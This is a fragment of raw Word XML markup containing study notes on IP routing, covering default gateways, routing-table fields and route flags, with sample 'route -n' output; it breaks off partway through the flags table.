        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="346"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004F6445">
        <w:t>Subnet mask: 255.255.255.0 (means local IPs are 192.168.1.x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE65091" w14:textId="77777777" w:rsidR="004F6445" w:rsidRPr="004F6445" w:rsidRDefault="004F6445" w:rsidP="004F6445">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="346"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004F6445">
        <w:t>Default gateway: 192.168.1.1 (your router)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ADA651" w14:textId="77777777" w:rsidR="004F6445" w:rsidRPr="004F6445" w:rsidRDefault="004F6445" w:rsidP="004F6445">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="346"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004F6445">
        <w:t>You visit 8.8.8.8 (Google DNS) → not in 192.168.1.x → traffic goes to 192.168.1.1 → router sends it to the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745E7177" w14:textId="099E1590" w:rsidR="003B6365" w:rsidRDefault="003B6365" w:rsidP="003B6365">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Routing Table and Route Selection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBF6DE2" w14:textId="27F506A5" w:rsidR="003B6365" w:rsidRDefault="003B6365" w:rsidP="003B6365">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26620238" w14:textId="77777777" w:rsidR="00692657" w:rsidRDefault="003B6365" w:rsidP="003B6365">
      <w:r w:rsidRPr="003B6365">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6365">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>routing table</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6365">
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6365">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data structure stored in router memory</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6365">
        <w:t xml:space="preserve"> that contains information about </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6365">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>known networks and the paths to reach them</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6365">
        <w:t>. Each entry includes the destination network, next-hop router, outgoing interface, and metrics used for route selection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFA01F5" w14:textId="4CF9CE09" w:rsidR="003B6365" w:rsidRDefault="003B6365" w:rsidP="003B6365">
      <w:r w:rsidRPr="003B6365">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Route selection</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6365">
        <w:t xml:space="preserve"> is the process by which routers choose the best path when multiple routes to the same destination exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A12FC61" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00B25479">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00B25479">
        <w:t>Routing Table Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086581B3" w14:textId="21F406B0" w:rsidR="00B25479" w:rsidRDefault="00B25479" w:rsidP="00B2547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netstate -rn   # or route -n</w:t>
      </w:r>
      <w:r w:rsidR="007C34E4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   # or ip route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DBB392" w14:textId="51FD95B7" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00A60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2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B25479">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Destination     Gateway         Genmask         Flags Metric Ref  Use Iface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C84BAB0" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00A60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2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B25479">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0.0.0.0         192.168.1.1     0.0.0.0         UG    100    0    0   eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFAB2D3" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00A60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2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B25479">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.1.0     0.0.0.0         255.255.255.0   U     0      0    0   eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAB2E07" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00A60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2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B25479">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>10.1.1.0        192.168.1.10    255.255.255.0   UG    50     0    0   eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6811B987" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00A60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2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B25479">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>172.16.0.0      192.168.1.20    255.240.0.0     UG    75     0    0   eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200D909C" w14:textId="461D7AFA" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00206BE9" w:rsidP="00B25479">
      <w:r>
        <w:t>Where</w:t>
      </w:r>
      <w:r w:rsidR="00B25479" w:rsidRPr="00B25479">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1342"/>
        <w:gridCol w:w="12896"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B25479" w:rsidRPr="00B25479" w14:paraId="22733366" w14:textId="77777777" w:rsidTr="00DF77E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4371650C" w14:textId="204DF6CC" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00206BE9" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12896" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="703E55EC" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B25479">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25479" w:rsidRPr="00B25479" w14:paraId="1DC720F4" w14:textId="77777777" w:rsidTr="00DF77E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3887A2DA" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B25479">
              <w:t>Destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12896" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="387C5B19" w14:textId="5BDDDE54" w:rsidR="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B25479">
              <w:t>Target network or host</w:t>
            </w:r>
            <w:r w:rsidR="00210D9C">
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidR="00210D9C" w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0.0.0.0 = any destination</w:t>
            </w:r>
            <w:r w:rsidR="00210D9C">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74D357D1" w14:textId="77777777" w:rsidR="00210D9C" w:rsidRDefault="00210D9C" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6847CA3C" w14:textId="77777777" w:rsidR="00210D9C" w:rsidRDefault="00210D9C" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Example: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D4F6D51" w14:textId="77777777" w:rsidR="00210D9C" w:rsidRPr="00210D9C" w:rsidRDefault="00210D9C" w:rsidP="00210D9C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Destination     Gateway         Genmask         Flags Iface</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49E1606C" w14:textId="77777777" w:rsidR="00210D9C" w:rsidRPr="00210D9C" w:rsidRDefault="00210D9C" w:rsidP="00210D9C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0.0.0.0         192.168.1.254   0.0.0.0         UG    eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="467F5405" w14:textId="3B455785" w:rsidR="00210D9C" w:rsidRPr="00B25479" w:rsidRDefault="00210D9C" w:rsidP="00210D9C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Meaning:</w:t>
            </w:r>
            <w:r w:rsidRPr="00210D9C">
              <w:t xml:space="preserve">  Any IP not matching a more specific route will be forwarded to 192.168.1.254 via eth0.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00210D9C">
              <w:t xml:space="preserve">Think of it like the </w:t>
            </w:r>
            <w:r>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00210D9C">
              <w:t>else</w:t>
            </w:r>
            <w:r>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00210D9C">
              <w:t xml:space="preserve"> branch in an </w:t>
            </w:r>
            <w:r>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00210D9C">
              <w:t>if/else</w:t>
            </w:r>
            <w:r>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00210D9C">
              <w:t xml:space="preserve"> chain</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25479" w:rsidRPr="00B25479" w14:paraId="5CD1D8E0" w14:textId="77777777" w:rsidTr="00DF77E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B480202" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B25479">
              <w:t>Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12896" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="148210F9" w14:textId="12074183" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B25479">
              <w:t>Next-hop router (</w:t>
            </w:r>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0.0.0.0 = directly connected</w:t>
            </w:r>
            <w:r w:rsidRPr="00B25479">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25479" w:rsidRPr="00B25479" w14:paraId="4F82C4BA" w14:textId="77777777" w:rsidTr="00DF77E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="797A00F5" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B25479">
              <w:t>Genmask</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12896" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5883B34F" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B25479">
              <w:t>Subnet mask for the destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25479" w:rsidRPr="00B25479" w14:paraId="0653C4FC" w14:textId="77777777" w:rsidTr="00DF77E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66C1E40B" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B25479">
              <w:t>Flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12896" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D1CEE1B" w14:textId="4CFEF76A" w:rsidR="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B25479">
              <w:t>Route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
              <w:gridCol w:w="4320"/>
              <w:gridCol w:w="5040"/>
              <w:gridCol w:w="2070"/>
            </w:tblGrid>
            <w:tr w:rsidR="003141FE" w:rsidRPr="00B25479" w14:paraId="25EEA622" w14:textId="77777777" w:rsidTr="00997120">
              <w:trPr>
                <w:tblHeader/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="595" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="56A348B6" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>Flag</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4290" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="51294BED" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>Desription</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5010" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="3852ACD3" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>Description</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2025" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="56BCD971" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>Example snippet</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="003141FE" w:rsidRPr="00B25479" w14:paraId="08261089" w14:textId="77777777" w:rsidTr="00997120">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="595" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="4F683746" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>U</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4290" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="6C1D58DC" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>Route is up/usable</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5010" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="3CE6E75C" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>Interface is up and route is active</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2025" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="01467C95" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>UG, UGH, U</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="003141FE" w:rsidRPr="00B25479" w14:paraId="781A1A83" w14:textId="77777777" w:rsidTr="00997120">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="595" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="37551849" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>G</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4290" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="5691768E" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>Uses a gateway (next hop)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5010" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="257E196D" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>Destination isn’t directly connected</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2025" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="71A23D64" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>UG, UGH</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="003141FE" w:rsidRPr="00B25479" w14:paraId="3C2478DE" w14:textId="77777777" w:rsidTr="00997120">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="595" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="1C781717" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>H</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4290" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="461A9ECD" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>Host route (single IP)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5010" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
